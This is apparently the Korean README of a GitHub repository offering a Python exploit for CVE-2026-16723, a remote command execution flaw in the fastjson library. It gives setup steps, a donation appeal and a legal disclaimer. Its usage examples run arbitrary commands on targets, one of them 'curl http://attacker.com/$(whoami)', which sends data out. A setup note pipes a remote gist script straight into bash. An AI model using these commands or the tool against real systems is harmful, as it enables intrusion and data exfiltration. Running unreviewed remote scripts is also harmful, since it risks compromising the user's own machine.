업데이트로 돌아가기
UpdatedAug 2, 2026

CVE-2026-16723 — Updated!

CVE-2026-16723

공유

CVE-2026-16723

후원

PayPal 또는 아래 QR 코드를 스캔하여 이 프로젝트의 유지 관리를 후원해 주세요.

paypal

기부용 QR 코드

⚡ 간단한 사용법

이 프로젝트는 다음과 같은 안전하고 승인된 환경에서만 사용하세요.

  • 로컬 가상 머신
  • Docker 컨테이너
  • 격리된 실습 환경
  • 승인된 침투 테스트 환경

설정 예시:

git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723

# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

사용 예시:

# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse

# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"

# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000

# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure

# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080

# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50

# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet

참고:

  • 다른 프로젝트에서 복제한 경우 중첩된 .git 디렉터리를 정리하려면 curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y를 실행해야 합니다.
  • 예: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

출처 또는 참고 자료


📚 교육용 보안 연구 저장소

통제된 환경에서 사이버 보안 개념을 학습, 테스트, 연구하기 위한 저장소입니다.


⚠️ 보안 및 법적 고지

목적

이 저장소는 교육 및 승인된 보안 연구 목적으로만 사용됩니다.

사용자가 다음을 학습하도록 돕기 위해 설계되었습니다:

  • 보안 취약점
  • 샌드박스 및 격리 개념
  • 안전한 코딩 및 방어적 보안 실무

승인된 용도로만 사용

권한이 있는 환경에서만 이 저장소를 사용하세요. 예:

  • 개인 실습 환경 또는 가상 머신
  • Docker 또는 격리된 환경
  • 승인된 침투 테스트
  • 사이버 보안 교육 또는 학술 연구

승인되지 않았거나 불법적인 사용은 엄격히 금지됩니다.


면책 조항

저자와 기여자는 이 프로젝트로 인해 발생하는 손해, 오용, 법적 문제 또는 손실에 대해 책임을 지지 않습니다.

이 저장소를 사용함으로써 다음에 동의하게 됩니다:

  • 본인의 행동에 대한 책임은 본인에게 있습니다
  • 법적·윤리적으로 사용할 것입니다
  • 프로젝트는 보증 없이 제공됩니다

윤리적 사용

이 프로젝트는 다음을 위해 만들어졌습니다:

  • 방어적 보안 연구
  • 사이버 보안 교육
  • 취약점 인식 제고
  • 안전한 시스템 및 소프트웨어 연구

책임 있는 공개 관행을 따르고 적용 가능한 모든 법률을 준수해 주세요.


연락처

책임 있는 공개 또는 협업을 위해 GitHub를 통해 저장소 관리자에게 연락하세요.

카테고리